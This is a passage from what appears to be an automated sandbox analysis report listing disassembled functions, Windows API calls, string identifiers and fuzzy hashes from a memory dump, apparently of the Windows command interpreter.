                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,000287E5,00000000,?,00014A0A), ref: 0003484A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: _get_osfhandle.MSVCRT ref: 0001DDA3
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0002C050), ref: 0001DDAD
                                                                                                                                                                                                                                                                                                                                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,000287E5,00000000,?,00014A0A), ref: 00034879
                                                                                                                                                                                                                                                                                                                                                                                                                          • _getch.MSVCRT ref: 0003487F
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,000287E5,00000000,?,00014A0A), ref: 00034897
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,000287E5,00000000,?,00014A0A), ref: 000348AD
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 491502236-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1a4bb324dc8ff0dfee988cb853f6bad29e3db3bbd9ece4e3ee0ec080fa5875f1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b064567ae0d9e74de0f6bd253d9fef5df9fe71def20bdc7a58dc1c4811426b79
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a4bb324dc8ff0dfee988cb853f6bad29e3db3bbd9ece4e3ee0ec080fa5875f1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D401D475205350AFFB556BA0AC0EBDF7BA8DF02725F100219F8059A1E1DF799D80CA65
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00016488 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 296COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00016513: memset.MSVCRT ref: 00016593
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00018E86,00018E5A,00000000), ref: 0001DC98
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DC60: RtlFreeHeap.NTDLL(00000000), ref: 0001DC9F
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0002A097
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heapmemset$FreeProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1291122668-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 74c6f1abf16a2f9da51c577f5b426bbd400104e37c8811da2d6d35d2cdf51425
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cb3eef83a63f1721f691d61c9db30ec55f326087bdb3780905df6628bcae8580
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74c6f1abf16a2f9da51c577f5b426bbd400104e37c8811da2d6d35d2cdf51425
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98B1DF71E00229DFCB24DFA8D981AEEB7F5EF59710F144069E805AB242DB31ED91CB91
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00035948 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 252registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00035997
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001AB7F: iswspace.MSVCRT ref: 0001AB8D
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001AB7F: wcschr.MSVCRT ref: 0001AB9E
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Enumiswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s$\Shell\Open\Command
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3493821229-3301834661
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2f46b91c6bd0ee822b867af6c0cfe272951ec06dbf7bdcb62c41fce2a4e12928
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1461d710c1e03ce06d17759cd79f1017f6f944c5c4717356884f82b5d0db87e3
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f46b91c6bd0ee822b867af6c0cfe272951ec06dbf7bdcb62c41fce2a4e12928
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B816DB1E006195BDF359B28CC95BFE73BDEF84301F1442A9E40A97251EB709E81CB91
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001CCD0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 178COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GeToken: (%x) '%s'$Ungetting: '%s'
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 0-1704545398
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3e28a1a694b78b1199f31d042e2ca889f505f972cb447069147249f863808d7b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8b653e2bb79b57c297ccc2d7713ce0a0a011dccb8d86ea923d965134a0562e35
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e28a1a694b78b1199f31d042e2ca889f505f972cb447069147249f863808d7b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E515975A8020196FB747B64E815FFE36E2FB51314F18453AD80687291EBB9CCC4C792
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00034DBD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: iswdigit$wcstol
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: aApP
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 644763121-2547155087
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f3b1dc6e3cce7a4d123fb0968747a109600af5da2236efe13fc8cff12b69508e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0e3760610b2848c1b7385815cefd3af4ec8620227194058ad2800b0b844cfa9e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3b1dc6e3cce7a4d123fb0968747a109600af5da2236efe13fc8cff12b69508e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E641E775A001128ACF659F68C8916BFB3E9FF95701F18443AE946DF281E634ED82C661
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000357A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000357F8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00035886
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: EnumErrorLast
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%s$.
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1967352920-4275322459
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f7639b25b3b69798568932bfa800692771975c48309df90d04cdf66122e7af58
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 4a93893825154c0a086c9ba17a2b3d96ca537f678e2a7124da6833ca9adb176b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7639b25b3b69798568932bfa800692771975c48309df90d04cdf66122e7af58
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57414C75F0062597CB35AB288C95AFF73BDEF84311F1445AEE40AA7252DEB04E818AD0
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0003A759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003A79F
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 0003A83C
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?), ref: 0003A8B5
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %5lu
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2448137811-2100233843
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 95faf537e70fa5ad18f4a502bcbe4c78f180f5e220df84d1fbc0cfa889d16470
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a4faf9e0adea89ef8de8076fd652d5b8357c3a3f115012e99899217ba1e419b8
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95faf537e70fa5ad18f4a502bcbe4c78f180f5e220df84d1fbc0cfa889d16470
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD41D771A00219ABDF15DBA4DCD5BEEB7B8EF09304F0044ADE905A7242EB749F85CB51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0003378A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0(001F0003,00000000,?), ref: 00033835
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00033847
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorLastOpenSemaphore
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: _p0$wil
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1909229842-1814513734
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 78db8e0854d30b16da9f27cd3f8c394f6f8b6a05659af112fe03c18a767d8aee
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a6a8cfa51d7e749633d761df409be37e546925ba0d2962513f4bca02947f9b45
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78db8e0854d30b16da9f27cd3f8c394f6f8b6a05659af112fe03c18a767d8aee
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE41E8B1E013298BCB26DF28C8956EAB7F9EF94700F148299E809D7241DF70DF458B90
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0003237E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 0003239F
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 000323CD
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateCurrentMutexProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Local\SM0:%d:%d:%hs$wil
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3937467467-2303653343
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9f53c5f9fda094d37bbf5c9cdaf3affaf7247a9ecb1028d590598283f156416b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d39978e64b7d6579f55ef9159cb822f8ea84a8e87a1c67e76462df4dbba8fcd4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f53c5f9fda094d37bbf5c9cdaf3affaf7247a9ecb1028d590598283f156416b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C41C576A4022C9BCB22EB54DC89AEEB7B9AF94700F1041C5E909A7241DB709F858F91
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0003B222 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003B25E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcslwr.MSVCRT ref: 0003B2D2
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?), ref: 0003B30B
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$_wcslwr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: [%s]
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 886762496-302437576
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 210b53315f95602d79ec608088069c9f820664ac0490266469faba4513bd3d92
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: fd613c7376454e1f8b95ff70c76cb62f5e796b21aa964ced45db96e0a6c9029a
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 210b53315f95602d79ec608088069c9f820664ac0490266469faba4513bd3d92
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9318271B002196BDB15DBA9D8C5BEFB7FCAB58314F0401A9A605E3242DB74DE848B50
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00024BAF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: /-Y$COPYCMD
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1886669725-617350906
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3defc6e345137a12e3ca1f5eee7e75cafa4b4772dc7cddf4984afbffb49444d6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 25208438ef5778c24b9544265b0dd4c1375b29b1167c670e499175421091f473
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3defc6e345137a12e3ca1f5eee7e75cafa4b4772dc7cddf4984afbffb49444d6
